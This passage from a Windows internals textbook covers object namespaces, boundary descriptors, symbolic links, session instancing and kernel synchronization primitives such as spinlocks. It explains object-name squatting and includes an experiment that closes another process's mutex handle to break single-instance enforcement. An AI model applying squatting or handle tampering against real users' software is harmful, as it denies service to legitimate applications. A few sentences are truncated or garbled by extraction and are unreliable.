when dealing with named objects is the possibility of malicious object name squatting. Although object
names in different sessions are protected from each other, there is no standard protection inside the
current session namespace that can be set with the standard Windows API. This makes it possible for an
unprivileged application running in the same session as a privileged application to access its objects,
as described earlier in the object security subsection. Unfortunately, even if the object creator used
a proper DACL to secure the object, this does not help against the squatting attack, in which the un-
privileged application creates the object before the privileged application, thus denying access to the
legitimate application.
Windows exposes the concept of a private namespace to alleviate this issue. It allows user-mode
applications to create object directories through the CreatePrivateNamespace API and associate these
directories with boundary descriptors created by the CreateBoundaryDescriptor API, which are special
data structures protecting the directories. These descriptors contain SIDs describing which security
principals are allowed access to the object directory. In this manner, a privileged application can be
sure that unprivileged applications will not be able to conduct a denial-of-service attack against its
objects. Additionally, a boundary descriptor can also contain an integrity level, protecting objects possibly
belonging to the same user account as the application based on the integrity level of the process. (See
Chapter 7 of Part 1 for more information on integrity levels.)
One of the things that makes boundary descriptors effective mitigations against squatting attacks
is that unlike objects, the creator of a boundary descriptor must have access (through the SID and
integrity level) to the boundary descriptor. Therefore, an unprivileged application can only create an
unprivileged boundary descriptor. Similarly, when an application wants to open an object in a private
namespace, it must open the namespace using the same boundary descriptor that was used to create
it. Therefore, a privileged application or service would provide a privileged boundary descriptor, which
would not match the one created by the unprivileged application.
EXPERIMENT: Looking at the base named objects and private objects
You can see the list of base objects that have names with the WinObj tool from Sysinternals or
with WinObjEx64. However, in this experiment, we use WinObjEx64 because it supports addi-
tional object types and because it can also show private namespaces. Run Winobjex64.exe, and
click the BaseNamedObjects node in the tree, as shown here:
The named objects are listed on the right. The icons indicate the object type:

• Mutexes are indicated with a stop sign.
• Events are shown as exclamation points.
• Symbolic links have icons that are curved arrows.
• Power/network plugs represent ALPC ports.
• Timers are shown as clocks.
• Other icons, such as various types of gears, locks, and chips, are used for other object types.
164
CHAPTER 8 System mechanisms
Now use the Extras menu and select Private Namespaces. The private namespace objects are
shown here:

For each object, the boundary descriptor it belongs to is listed (in this case, the
mutex is part of the LoadPerf boundary), along with the SID(s) and integrity level associated with it (in
this case, no explicit integrity is set, and the SID is the one for the Administrators group). Note
that for this feature to work, you must have enabled kernel debugging on the machine the tool is
running on (either locally or remotely), as WinObjEx64 uses the WinDbg local kernel debugging
driver to read kernel memory.
CHAPTER 8 System mechanisms
165
EXPERIMENT: Tampering with single instancing

Applications such as Windows Media Player are common examples of single-instancing
enforcement through named objects. Notice that when launching the Wmplayer.exe executable,
Windows Media Player appears only once—every other launch simply results in the window
coming back into focus. You can tamper with the handle list by using Process Explorer:

1. Launch Windows Media Player and Process Explorer to view the handle table (by clicking
View, Lower Pane View, and then Handles). You should see a handle to the named mutex that
Windows Media Player uses for its single-instance check.

2. Right-click the handle and select Close Handle, confirming the action. Note that Process
Explorer should be started as Administrator to be able to close a handle in another process.

3. Run Windows Media Player again. Notice that this time a second process is created.

4. Go ahead and play a different song in each instance. You can also use the Sound Mixer
in the system tray (click the Volume icon) to select which of the two processes will have
greater volume, effectively creating a mixing environment.

Instead of closing a handle to a named object, an application could have run on its own
before Windows Media Player and created an object with the same name. In this scenario, Windows
Media Player would never run because it would be fooled into believing it was already running
on the system.
Symbolic links

In certain file systems (on NTFS and some UNIX systems, for example), a symbolic link lets a user
create a file name or a directory name that, when used, is translated by the operating system into a
different file or directory name. Using a symbolic link is a simple way to allow users to indirectly
share a file or a directory's contents, creating a cross-link between branches of the ordi-
narily hierarchical directory structure.

The Object Manager implements an object called a symbolic link object, which performs a similar
function for object names in its object namespace. A symbolic link can occur anywhere within an object
name string. When a caller refers to a symbolic link object's name, the Object Manager traverses its
namespace until it reaches the symbolic link object, then looks inside it and finds a
string that it substitutes for the symbolic link name. It then restarts its name lookup.

One place in which the executive uses symbolic link objects is in translating MS-DOS-style device
names into Windows internal device names. In Windows, a user refers to hard disk drives using the names
C:, D:, and so on, and serial ports as COM1, COM2, and so on. The Windows subsystem creates these
symbolic link objects and places them in the Object Manager namespace under the \Global?? direc-
tory, which can also be done for additional drive letters through the DefineDosDevice API.
For example, the memory manager historically signaled a single event named LowMemoryCondition, but
due to the introduction of memory partitions (described in Chapter 5 of Part 1), the condition that
the event signals is now dependent on which partition the caller is running in (and should have
visibility of). As such, there is now a LowMemoryCondition event for each memory partition, and
callers must be redirected to the correct event for their partition. This is achieved with a
symbolic link callback, which is executed each time the link is parsed by the Object Manager. With
WinObjEx64, you can see the registered callback, as shown in Figure 8-36. (In a kernel debugger, you
can see it by doing a !object \KernelObjects\LowMemoryCondition command and then dumping the
_OBJECT_SYMBOLIC_LINK structure with the dx command.)

FIGURE 8-36 The LowMemoryCondition symbolic link redirection callback.
Session namespace
Services have full access to the global namespace, the first instance of the namespace. Regular user
applications then have read-write (but not delete) access to the global namespace (minus some
exceptions we explain soon). In turn, however, interactive user sessions are then given a
session-private view of the namespace known as a local namespace. This namespace provides full
read/write access to the base named objects by all applications running within that session.

Making separate copies of the same parts of the namespace is known as instancing the namespace.
Instancing ensures that when multiple users are running an application that creates a named object,
each user session has a private version of the object, so the sessions don't conflict by access-
ing the same object. If the Win32 application is running under an AppContainer, however, or is a UWP
application, its named objects are instead stored under directories whose names correspond to the
Package SID of the AppContainer (see Chapter 7 of Part 1 for more information on AppContainer and the
Windows sandboxing model).

The Object Manager implements a local namespace by creating the private versions of the four base
directories under a session-specific directory, \Sessions\n (where n is the session identifier).
When a Windows application in session 2 creates a named event, for example, the Win32 subsystem (as
part of the BaseGetNamedObjectDirectory API in Kernelbase.dll) transparently redirects the object's
name from \BaseNamedObjects to \Sessions\2\BaseNamedObjects.
One more way through which named objects can be accessed is through a security feature called
Base Named Object (BNO) Isolation. Parent processes can launch a child with the ProcThreadAttribute
BnoIsolation process attribute, supplying an isolation prefix. This makes the process-creation path
build a private object direc-
tory and initial set of objects (such as symbolic links) to support it, and then have NtCreateUserProcess
record the prefix and the associated handles in the child's token (in the BnoIsolationHandlesEntry
field).

Later, BaseGetNamedObjectDirectory queries the Token object to check if BNO Isolation is enabled,
and if so, it uses that directory as the base directory for the process's named objects. This creates a
sort of sandbox for a process without having to use the AppContainer functionality.
All object-manager functions related to namespace management are aware of the instanced direc-
tories and participate in providing the illusion that all sessions use the same namespace. Windows
subsystem processes also have their DOS device names instanced: each session associates its own
DosDevices directory with \??. To support this, the Object Manager uses a field
named DeviceMap in the executive process object (EPROCESS, which is described further in Chapter 3
of Part 1) that points to a data structure shared by other processes in the same session.

The DosDevicesDirectory field of the DeviceMap structure points at the Object Manager directory
that represents the process's local \??. If a name lookup in that directory fails, the Object
Manager falls back to the directory referenced by the DeviceMap's GlobalDosDevicesDirectory field,
which always points at the global \Global?? directory.
Under certain circumstances, session-aware applications need to access objects in the global session
even if the application is running in another session. The application might want to do this to synchro-
nize with instances of itself running in other remote sessions or with the console session (that is,
session 0); for these cases, an application can prefix an object name with Global\ to explicitly
refer to the global namespace.

Session directories are isolated from each other, but as mentioned earlier, regular user applications
can read and write the global namespace. Section and symbolic link objects, however, cannot be
globally created unless the caller is running in Session 0 or possesses a special privilege named
create global object—unless the object's name is listed in the ObUnsecureGlobalNames registry value.
By default, these names are usually listed:
• netfxcustomperfcounters.1.0
• SharedPerfIPCBlock
EXPERIMENT: Viewing namespace instancing

You can see the separation between the session 0 namespace and other session namespaces with
WinObj: open the \Sessions directory, and you will see a subdirectory with a numeric name for
each active session. If you open one of these directories, you'll see subdirectories such as
BaseNamedObjects, which are the local namespace subdirectories of the session.

Next, run Process Explorer and select a process in your session (such as Explorer.exe), and then
view the handle table (by clicking View, Lower Pane View, and then Handles). You should see
handles whose names begin with \Sessions\n, where n is the session ID.
Object filtering
Drivers can filter Object Manager operations, with the ability to use the altitude concept familiar
from the file system minifilter and registry callback models, so that multiple drivers can filter
Object Manager events at appropriate locations in the filtering stack. Driv-
ers are permitted to intercept calls such as NtOpenThread and NtOpenProcess and even to modify the
access masks being requested from the process manager. This allows protection against certain opera-
tions on an open handle—such as preventing a piece of malware from terminating a benevolent security
process or stopping a password dumping application from obtaining read memory permissions on the
LSA process. Note, however, that an open operation cannot be entirely blocked due to compatibility is-
sues, such as making Task Manager unable to query the command line or image name of a process.

Filtering drivers can register both pre and post callbacks, allowing them to prepare for an operation
before it occurs and to react to, or finalize state after, one that has occurred. They can also
associate context with an operation, which can be returned across all calls to the driver or across
a pre/post pair. These callbacks can be registered with the ObRegisterCallbacks API and unregistered
with the ObUnregisterCallbacks API—it is the responsibility of the driver to ensure deregistration
happens.
Use of the APIs is restricted to images that have certain characteristics:

• The image must be signed, even on 32-bit computers, according to the same rules set forth in
the Kernel Mode Code Signing (KMCS) policy, and compiled with the /integritycheck linker flag,
which sets the IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY value in the PE header. This instructs
the memory manager to check the signature of the image regardless of any other defaults that
might not normally result in a check.

• The image must be signed with a catalog containing cryptographic per-page hashes of the
executable code. This allows the system to detect changes to the image after it has been loaded
in memory.

Before executing a callback, the Object Manager calls the MmVerifyCallbackFunction on the target
function pointer, which in turn locates the loader data table entry associated with the module owning
this address and verifies whether the LDRP_IMAGE_INTEGRITY_FORCED flag is set.
Synchronization
The concept of mutual exclusion is crucial in operating systems development. It refers to the guar-
antee that one, and only one, thread can access a particular resource at a time. Mutual exclusion is
necessary when a resource doesn't lend itself to shared access or when sharing would result in an
unpredictable outcome. For example, Figure 8-37 shows what happens when two threads running on
different processors both write data to a circular queue.
Time          Processor A                              Processor B
  |           Get queue tail
  |           Insert data at current location
  |                                                    Get queue tail
  |           Increment tail pointer
  |                                                    Insert data at current location  /* ERROR */
  v                                                    Increment tail pointer
FIGURE 8-37 Incorrect sharing of memory.
Although this example illustrates what could happen on a multiprocessor system, the same error could
occur on a single-processor system if the operating system performed a context switch to the second
thread before the first thread updated the queue tail pointer.

Sections of code that access a nonshareable resource are called critical sections. To ensure correct
code execution, only one thread at a time can execute within a critical section. While one thread is
writing to a file, updating a database, or modifying a shared variable, no other thread can be allowed
to access the same data structure without mutual exclusion.
The issue of mutual exclusion, although important for all operating systems, is especially impor-
tant (and intricate) for a tightly coupled, symmetric multiprocessing (SMP) operating system such as
Windows, in which the same system code runs simultaneously on more than one processor, sharing
memory. In Windows, it is the kernel's job to provide mecha-
nisms that system code can use to prevent two threads from modifying the same data at the same
time. The kernel provides mutual-exclusion primitives that it and the rest of the executive use to syn-
chronize their access to global data structures.
Because the scheduler synchronizes access to its data structures at DPC/dispatch level IRQL, the
kernel and executive cannot rely on synchronization mechanisms that would result in a page fault or
reschedule operation to synchronize access to data structures when the IRQL is DPC/dispatch level
or higher (levels known as an elevated or high
kernel and executive use mutual exclusion to protect their global data structures when the IRQL is high
and what mutual-exclusion and synchronization mechanisms the kernel and executive use when the
IRQL is low (below DPC/dispatch level).
High-IRQL synchronization
At various stages during its execution, the kernel must guarantee that one, and only one, processor at
a time is executing within a critical section. Kernel critical sections are the code segments that modify
a global data structure such as the kernel's dispatcher database or its DPC queue. The operating
system can't function correctly unless the kernel can guarantee that threads access these data structures in a
mutually exclusive manner.
Simple single-processor operating systems sometimes prevent such a scenario by disabling all inter-
rupts each time they access global data, but the Windows kernel has a more sophisticated solution.
Before using a global resource, the kernel temporarily masks the interrupts whose interrupt handlers
also use the resource. It does so by raising the processor's IRQL to the highest level used by any
potential interrupt source that accesses the global data. For example, an interrupt at DPC/dispatch level
causes the dispatcher, which uses the dispatcher database, to run. Therefore, any other part of the
kernel that uses the dispatcher database raises the IRQL to DPC/dispatch level, masking DPC/dispatch-
level interrupts before using the dispatcher database.
This strategy is fine for a single-processor system, but it's inadequate for a multiprocessor configuration: raising the IRQL on one processor doesn't prevent an interrupt from occurring on another
processor. The kernel also needs to guarantee mutually exclusive access across several processors.
Interlocked operations
The simplest form of synchronization mechanisms relies on hardware support for multiprocessor-
safe manipulation of integer values and for performing comparisons. They include functions such as
InterlockedIncrement, InterlockedDecrement, InterlockedExchange, and InterlockedCompareExchange.
The InterlockedDecrement function, for example, uses the x86 and x64 lock instruction prefix (for exam-
ple, lock xadd) to lock the multiprocessor bus during the operation so that another processor
that's also modifying the target memory location can't modify it between the read of the original value
and the write of the new value. This form of basic synchronization is used by the kernel and drivers. These
functions are called intrinsic because the code for them is generated in an inline assembler, directly
during compilation, rather than through a function call: pushing the pa-
rameters onto the stack, calling the function, copying the parameters into registers, and then popping
the parameters off the stack and returning to the caller would be a more expensive operation than the
work the function performs in the first place.
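The semantics of these intrinsics can be sketched with portable C11 atomics. The helper names below are invented for illustration; the real Windows routines are compiler intrinsics that emit lock-prefixed instructions, not function calls like these.

```c
#include <assert.h>
#include <stdatomic.h>

/* Analog of InterlockedIncrement: atomically add 1 and return the new value.
 * (atomic_fetch_add returns the previous value, so adjust by 1.) */
static long interlocked_increment(atomic_long *target)
{
    return atomic_fetch_add(target, 1) + 1;
}

/* Analog of InterlockedCompareExchange: if *target equals comparand, store
 * exchange; in all cases, return the value *target held before the call. */
static long interlocked_compare_exchange(atomic_long *target,
                                         long exchange, long comparand)
{
    long observed = comparand;
    atomic_compare_exchange_strong(target, &observed, exchange);
    return observed;  /* updated to the prior value if the exchange failed */
}
```

Compiled natively for x86/x64, the `atomic_fetch_add` here lowers to exactly the kind of `lock xadd` sequence described above.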
Spinlocks
The mechanism the kernel uses to achieve multiprocessor mutual exclusion is called a spinlock. A
spinlock is a locking primitive associated with a global data structure, such as the DPC queue shown in Figure 8-38.
FIGURE 8-38 Using a spinlock. (Processor A and Processor B each loop, "Do: try to acquire DPC queue spinlock, until SUCCESS," before entering a critical section in which one removes a DPC from the queue and the other adds a DPC to the queue; each then releases the DPC queue spinlock.)
Before entering either critical section shown in the figure, the kernel must acquire the spinlock associated with the protected DPC queue. If the spinlock isn't free, the kernel keeps trying to acquire the
lock until it succeeds. The spinlock gets its name from the fact that the kernel (and thus, the processor)
waits, “spinning,” until it gets the lock.
Spinlocks, like the data structures they protect, reside in nonpaged memory mapped into the
system address space. The code to acquire and release a spinlock is written in assembly language for
speed and to exploit whatever locking mechanism the underlying processor architecture provides. On
many architectures, spinlocks are implemented with a hardware-supported test-and-set operation,
which tests the value of a lock variable and acquires the lock in one atomic instruction. Testing and ac-
quiring the lock in one instruction prevents a second thread from grabbing the lock between the time
the first thread tests the variable and the time it acquires the lock. Additionally, a locking prefix
such as the lock instruction mentioned earlier can also be used on the test-and-set operation, resulting in
the combined lock bts opcode on x86 and x64 processors, which also locks the multiprocessor bus; oth-
erwise, it would be possible for more than one processor to perform the operation atomically. (Without
the lock, the operation is guaranteed to be atomic only on the current processor.) Similarly, on ARM
processors, instructions such as ldrex and strex can be used in a similar fashion.
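A minimal spinlock built on the hardware test-and-set primitive can be sketched in portable C11. This is a conceptual analog, not the kernel's implementation: `atomic_flag_test_and_set` compiles down to `lock bts`-style sequences on x86/x64 and to `ldrex`/`strex` loops on ARM.

```c
#include <assert.h>
#include <stdatomic.h>

typedef struct {
    atomic_flag locked;
} spinlock_t;

#define SPINLOCK_INIT { ATOMIC_FLAG_INIT }

static void spin_acquire(spinlock_t *lock)
{
    /* Test and set in one atomic operation: a false return value means the
     * flag was clear, i.e., we just transitioned the lock from free to held. */
    while (atomic_flag_test_and_set_explicit(&lock->locked,
                                             memory_order_acquire)) {
        /* Busy-wait ("spin") until the current holder releases the lock. */
    }
}

static void spin_release(spinlock_t *lock)
{
    atomic_flag_clear_explicit(&lock->locked, memory_order_release);
}
```

The acquire/release memory orderings mirror the role the bus lock plays in the kernel's version: writes made inside the critical section become visible before the lock is observed as free.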
All kernel-mode spinlocks in Windows have an associated IRQL that is always DPC/dispatch level or
higher. Thus, when a thread is trying to acquire a spinlock, all other activity at the spinlock's IRQL or
lower ceases on that processor. Because thread dispatching happens at DPC/dispatch level, a thread
that holds a spinlock is never preempted because the IRQL masks the dispatching mechanisms. This
masking allows code executing in a critical section protected by a spinlock to continue executing so
that it will release the lock quickly. The kernel uses spinlocks with great care, minimizing the number of
instructions it executes while it holds a spinlock. Any processor that attempts to acquire the spinlock
while it is held essentially busy-waits indefinitely, consuming power and performing no actual work.
On x86 and x64 processors, a special pause assembly instruction can be inserted in busy wait loops,
and on ARM processors, yield serves the same purpose. This instruction offers a hint to the processor
that the loop instructions it is processing are part of a spinlock (or a similar construct) acquisition loop.
The instruction provides three benefits:
I
It significantly reduces power usage by delaying the core ever so slightly instead of continuously
looping.
I
On SMT cores, it allows the CPU to realize that the “work” being done by the spinning logical
core is not terribly important and awards more CPU time to the second logical core instead.
I
Because a busy wait loop results in a storm of read requests coming to the bus from the waiting
thread (which might be generated out of order), the CPU attempts to correct for violations of
memory order as soon as it detects a write (that is, when the owning thread releases the lock).
Thus, as soon as the spinlock is released, the CPU reorders any pending memory read opera-
tions to ensure proper ordering. This reordering results in a large penalty in system perfor-
mance and can be avoided with the pause instruction.
If the kernel detects that it is running under a Hyper-V compatible hypervisor, which sup-
ports the spinlock enlightenment (described in Chapter 9), the spinlock facility can use the
HvlNotifyLongSpinWait library function when it detects that the spinlock is currently owned
by another CPU, instead of continuously spinning and using the pause instruction. The func-
tion emits a HvCallNotifyLongSpinWait hypercall to indicate to the hypervisor scheduler that
another VP should take over instead of emulating the spin.
The kernel makes spinlocks available to other parts of the executive through a set of kernel func-
tions, including KeAcquireSpinLock and KeReleaseSpinLock. Device drivers, for example, require spin-
locks to guarantee that device registers and other global data structures are accessed by only one part
of a device driver (and from only one processor) at a time. Spinlocks are not for use by user programs—
user programs should use the objects described in the next section. Device drivers also need to protect
access to their own data structures from interrupts associated with themselves. Because the spinlock
APIs described so far raise the IRQL only to DPC/dispatch level, this isn't enough, so the kernel provides the
KeAcquireInterruptSpinLock and KeReleaseInterruptSpinLock APIs. When these are used, the
system looks inside the interrupt object for the associated DIRQL with the interrupt and raises the IRQL
to the appropriate level to ensure correct access to structures shared with the ISR.
Devices can also use the KeSynchronizeExecution API to synchronize an entire function with an ISR
instead of just a critical section. In all cases, the code protected by an interrupt spinlock must execute
extremely quickly; any delay causes higher-than-normal interrupt latency and has significant
negative performance effects. Also, because spinlocks always have
an IRQL of DPC/dispatch level or higher, as explained earlier, code holding a spinlock will crash the
system if it attempts to make the scheduler perform a dispatch operation or if it causes a page fault.
Queued spinlocks
To increase the scalability of spinlocks, a special type of spinlock, called a queued spinlock, is used in
many circumstances instead of a standard spinlock, especially when contention is expected, and fair-
ness is required.
A queued spinlock works like this: When a processor wants to acquire a queued spinlock that is
currently held, it places its identifier in a queue associated with the spinlock. When the processor that's
holding the spinlock releases it, it hands the lock over to the first processor identified in the queue. In
the meantime, a processor waiting for a busy spinlock checks the status not of the spinlock itself but of
a per-processor flag that the processor ahead of it in the queue sets to indicate that the waiting
processor's turn has arrived.
The fact that queued spinlocks cause processors to spin on per-processor flags rather than on the
global spinlock has two effects. The first is that the multiprocessor's bus isn't as heavily trafficked by interprocessor
synchronization, and the memory location of the bit is not in a single NUMA node that then has to be
snooped through the caches of each logical processor. The second is that instead of a random pro-
cessor in a waiting group acquiring the spinlock, the queued spinlock enforces first-in, first-out (FIFO)
ordering on the lock, which yields more consistent (fairer) performance across processors. On the other hand,
queued spinlocks do require additional overhead, including extra interlocked operations, which do add
their own costs, so developers must balance the management overhead against the benefits to
decide if a queued spinlock is worth it for them.
Windows defines a number of global queued spinlocks by storing pointers to them in an array contained in each processor's
processor control region (PCR); on x64 systems, this is the LockArray field of the KPCR
data structure.
A global spinlock can be acquired by calling KeAcquireQueuedSpinLock with the index into the array
at which the pointer to the spinlock is stored. The number of global spinlocks originally grew in each
release of the operating system, and their indices are defined in the KSPIN_LOCK_QUEUE_NUMBER enumeration. Note, however,
that acquiring one of these queued spinlocks from a device driver is an unsupported and heavily
discouraged operation; these locks are reserved for the kernel's own internal use.
EXPERIMENT: Viewing global queued spinlocks
You can view the state of the global queued spinlocks (the ones pointed to by the queued
spinlock array in each processor's PCR) by using the !qlocks kernel debugger command. In the
following example, note that none of the locks are acquired on any of the processors, which is a
standard situation on a local system doing live debugging.
lkd> !qlocks
Key: O = Owner, 1-n = Wait order, blank = not owned/waiting, C = Corrupt
Processor Number
Lock Name
0 1 2 3 4 5 6 7
KE - Unused Spare
MM - Unused Spare
MM - Unused Spare
MM - Unused Spare
CC - Vacb
CC - Master
EX - NonPagedPool
IO - Cancel
CC - Unused Spare
In-stack queued spinlocks
Device drivers can use dynamically allocated queued spinlocks with the KeAcquireInStackQueued
SpinLock and KeReleaseInStackQueuedSpinLock functions. Several components—including the cache
manager—take advantage of these types of locks instead of the
global queued spinlocks.
KeAcquireInStackQueuedSpinLock takes a pointer to a spinlock data structure and a spinlock queue
handle. The spinlock queue handle is actually a data structure in which the kernel stores information
about the lock's status, including the lock's ownership and the queue of processors that might be
waiting for the lock to become available. This handle is
usually a stack variable, guaranteeing locality to the caller thread, and is responsible for the InStack part
of the spinlock and API name.
Reader/writer spin locks
While using queued spinlocks greatly improves latency in highly contended situations, Windows
supports another kind of spinlock that can offer the additional benefit of eliminating
contention in many situations to begin with. The multi-reader, single-writer spinlock, also called
the executive spinlock, is an enhancement on top of regular spinlocks, which is exposed through
the ExAcquireSpinLockExclusive and ExAcquireSpinLockShared APIs, and their ExReleaseXxx counterparts.
Additionally, ExTryAcquireSpinLockSharedAtDpcLevel and ExTryConvertSharedSpinLockToExclusive
functions exist for more advanced use cases.
As the name suggests, this type of lock allows noncontended shared acquisition of a spinlock if no
writer is present. When a writer is interested in the lock, readers must eventually release the lock, and
no further readers will be allowed while the writer is active (nor additional writers). If a driver developer
finds that threads mostly read the protected data structure and only rarely modify
items, this type of lock can remove contention in the majority of cases, removing the need for the com-
plexity of a queued spinlock.
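The shared/exclusive semantics can be sketched with a single atomic word that holds a reader count plus a writer bit. This is a simplified conceptual model with invented names; it also omits the writer-priority behavior described above.

```c
#include <assert.h>
#include <stdatomic.h>

#define RW_WRITER 0x80000000u   /* high bit: a writer owns the lock */

typedef struct {
    atomic_uint state;          /* reader count lives in the low bits */
} rw_spinlock_t;

static void rw_acquire_shared(rw_spinlock_t *lock)
{
    unsigned s = atomic_load(&lock->state);
    for (;;) {
        if (s & RW_WRITER) {    /* writer active: keep spinning */
            s = atomic_load(&lock->state);
            continue;
        }
        /* Try to bump the reader count; on failure s is reloaded for us. */
        if (atomic_compare_exchange_weak(&lock->state, &s, s + 1))
            return;
    }
}

static void rw_release_shared(rw_spinlock_t *lock)
{
    atomic_fetch_sub(&lock->state, 1);
}

static void rw_acquire_exclusive(rw_spinlock_t *lock)
{
    unsigned expected = 0;
    /* A writer may enter only when no readers and no writer are present. */
    while (!atomic_compare_exchange_weak(&lock->state, &expected, RW_WRITER))
        expected = 0;  /* CAS overwrote it with the observed value; retry */
}

static void rw_release_exclusive(rw_spinlock_t *lock)
{
    atomic_store(&lock->state, 0);
}
```

In the uncontended read-mostly case, acquisition is a single interlocked increment with no exclusive-lock traffic, which is where the contention win comes from.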
Executive interlocked operations
The kernel supplies some simple synchronization functions constructed on spinlocks for more
advanced operations, such as adding and removing entries from singly and doubly linked lists.
Examples include ExInterlockedPopEntryList and ExInterlockedPushEntryList for singly linked lists,
and ExInterlockedInsertHeadList and ExInterlockedRemoveHeadList for doubly linked lists. A few
other functions, such as ExInterlockedAddUlong and ExInterlockedAddLargeInteger also exist. All
these functions require a standard spinlock as a parameter and are used throughout the kernel and
device drivers.
Instead of relying on the standard APIs to acquire and release the spinlock parameter, these func-
tions place the code required inline and also use a different ordering scheme. Whereas the Ke spinlock
APIs use a test-and-set operation to make the acquisition, these routines disable interrupts on the processor and
immediately attempt an atomic test-and-set. If the initial attempt fails, interrupts are enabled again,
and the standard busy waiting algorithm continues until the test-and-set operation returns 0—in which
case the whole function is restarted again. Because of these subtle differences, a spinlock used for the
executive interlocked functions must not be used with the standard kernel APIs discussed previously.
Naturally, noninterlocked list operations must not be mixed with interlocked operations.
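The push/pop pattern behind ExInterlockedPushEntryList and ExInterlockedPopEntryList can be sketched with a compare-and-swap loop in C11. This is a conceptual analog only: the real routines take a spinlock and manage interrupts as described above, and this lock-free variant ignores the ABA hazard that the kernel's sequenced SLIST mechanism addresses.

```c
#include <assert.h>
#include <stdatomic.h>
#include <stddef.h>

typedef struct entry {
    struct entry *next;
} entry_t;

/* Push onto the front of the singly linked list (LIFO order). */
static void interlocked_push(_Atomic(entry_t *) *head, entry_t *e)
{
    entry_t *old = atomic_load(head);
    do {
        e->next = old;  /* old is refreshed by a failed compare-exchange */
    } while (!atomic_compare_exchange_weak(head, &old, e));
}

/* Pop the front entry, or return NULL if the list is empty. */
static entry_t *interlocked_pop(_Atomic(entry_t *) *head)
{
    entry_t *old = atomic_load(head);
    while (old != NULL &&
           !atomic_compare_exchange_weak(head, &old, old->next)) {
        /* old now holds the freshly observed head; retry */
    }
    return old;
}
```

The compare-exchange loop retries whenever another thread changed the head concurrently, which is the same "restart the whole operation" behavior described for the executive routines.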
Note Certain executive interlocked operations silently ignore the spinlock when possible.
For example, the ExInterlockedIncrementLong or ExInterlockedCompareExchange APIs use
the same lock prefix used by the standard interlocked functions.
These functions were useful on older systems (or non-x86 systems) where the lock operation
was not suitable or wasn't available. For this reason, these calls are now deprecated and are silently
inlined in favor of the intrinsic functions.
Low-IRQL synchronization
Executive software outside the kernel also needs to synchronize access to global data structures in a
multiprocessor environment. For example, the memory manager has only one page frame database,
which it accesses as a global data structure, and device drivers need to ensure that they can gain exclu-
sive access to their devices. By calling kernel functions, the executive can create a spinlock, acquire it,
and release it.
Because waiting for a spinlock literally stalls a processor, spinlocks can be used only under the following strictly
limited circumstances:
I
The protected resource must be accessed quickly and without complicated interactions with
other code.
I
The critical section code can't be paged out of memory, make references to pageable data, call external procedures (including system services), or generate interrupts or
exceptions.
These restrictions are confining and can't be met under all circumstances. Furthermore, the execu-
tive needs to perform other types of synchronization in addition to mutual exclusion, and it must also
provide synchronization mechanisms to user mode.
There are several additional synchronization mechanisms for use when spinlocks are not suitable:
I
Kernel dispatcher objects (mutexes, semaphores, events, and timers)
I
Fast mutexes and guarded mutexes
I
Pushlocks
I
Executive resources
I
Run-once initialization (InitOnce)
Additionally, user-mode code, which also executes at low IRQL, must be able to have its own locking primitives. Windows supports various user-mode-specific primitives:
I
System calls that refer to kernel dispatcher objects (mutants, semaphores, events, and timers)
I
Condition variables (CondVars)
I
Slim Reader-Writer Locks (SRW Locks)
I
Address-based waiting
I
Run-once initialization (InitOnce)
I
Critical sections
We look at the user-mode primitives and their underlying kernel-mode support later; for now, we
focus on kernel-mode objects. Table 8-26 compares and contrasts the capabilities of these mechanisms
and their interaction with kernel-mode APC delivery.
TABLE 8-26 Kernel synchronization mechanisms

Mechanism              Exposed for Use     Disables Normal     Disables Special    Supports Recursive  Supports Shared and
                       by Device Drivers   Kernel-Mode APCs    Kernel-Mode APCs    Acquisition         Exclusive Acquisition
Mutexes                Yes                 Yes                 No                  Yes                 No
Semaphores, events,    Yes                 No                  No                  No                  No
timers
Fast mutexes           Yes                 Yes                 Yes                 No                  No
Guarded mutexes        Yes                 Yes                 Yes                 No                  No
Pushlocks              Yes                 No                  No                  No                  Yes
Executive resources    Yes                 No                  No                  Yes                 Yes
Rundown protections    Yes                 No                  No                  Yes                 No
Kernel dispatcher objects
The kernel furnishes additional synchronization mechanisms to the executive in the form of kernel
objects, known collectively as dispatcher objects. The Windows API-visible synchronization objects ac-
quire their synchronization capabilities from these kernel dispatcher objects. Each Windows API-visible
object that supports synchronization encapsulates at least one kernel dispatcher object. The execu-
tive's synchronization semantics are visible to Windows programmers through the WaitForSingleObject
and WaitForMultipleObjects functions, which the Windows subsystem implements by calling analogous
system services that the Object Manager supplies. A thread in a Windows application can synchronize
with a variety of objects, including a Windows process, thread, event, semaphore, mutex, waitable
timer, I/O completion port, ALPC port, registry key, or file object. In fact, almost all objects exposed by
the kernel can be waited on. Some of these are proper dispatcher objects, whereas others are larger
objects that contain a dispatcher object within them. Table 8-27 (later in this
chapter in the section “What signals an object?”) shows the proper dispatcher objects, so any other
object that the Windows API allows waiting on probably internally contains one of those primitives.
Two other types of executive synchronization mechanisms worth noting are the executive resource
and the pushlock. These mechanisms provide exclusive access (like a mutex) as well as shared read
access (multiple readers sharing a single structure). However,
they have an API exposed through raw pointers and Ex APIs, and the Object Manager and its handle
system are not involved. The remaining subsections describe the implementation details of waiting for
dispatcher objects.
Waiting for dispatcher objects
The traditional way for a thread to synchronize with a dispatcher object is to wait on a handle to it,
through the NtWaitForXxx class of system calls, or, in kernel mode, through the KeWaitForXxx APIs, which
deal directly with the dispatcher object.
Because the Nt API communicates with the Object Manager (ObWaitForXxx class of functions), it
goes through the abstractions that were explained in the section on object types earlier in this chapter.
For example, with the Nt API, a wait can be performed on a handle to a File object, because the Object Manager uses
the information in the object type to redirect the wait to the Event field of the FILE_OBJECT. The Ke
API, on the other hand, only works with true dispatcher objects—that is to say, those that begin with
a DISPATCHER_HEADER structure. Regardless of the approach taken, these calls ultimately cause the
kernel to put the thread in a wait state.
A completely different, and more modern, approach to waiting on dispatcher objects is to rely on
asynchronous waiting. This approach leverages the existing I/O completion port infrastructure to as-
sociate a dispatcher object with the kernel queue backing the I/O completion port, by going through
an intermediate object called a wait completion packet. Thanks to this mechanism, a thread essentially
registers a wait but does not directly block on the dispatcher object and does not enter a wait state.
Instead, when the object is signaled, a wait completion packet is inserted into the queue associated with the I/O completion port.
This allows one or more threads to register wait indications on various objects, which a separate thread
(or pool of threads) can essentially wait on. This mechanism is the linchpin of the thread pool API's wait callbacks, such as CreateThreadPoolWait
and SetThreadPoolWait.
A final wait mechanism was added in Windows 10, through the DPC Wait Event functionality that is currently reserved for Hyper-V (although the API is exported, it is not documented for general use). This mechanism is
reserved for kernel-mode drivers, in which a deferred procedure call (DPC, explained earlier in this
chapter) can be associated with a dispatcher object, instead of a thread or I/O completion port. Similar
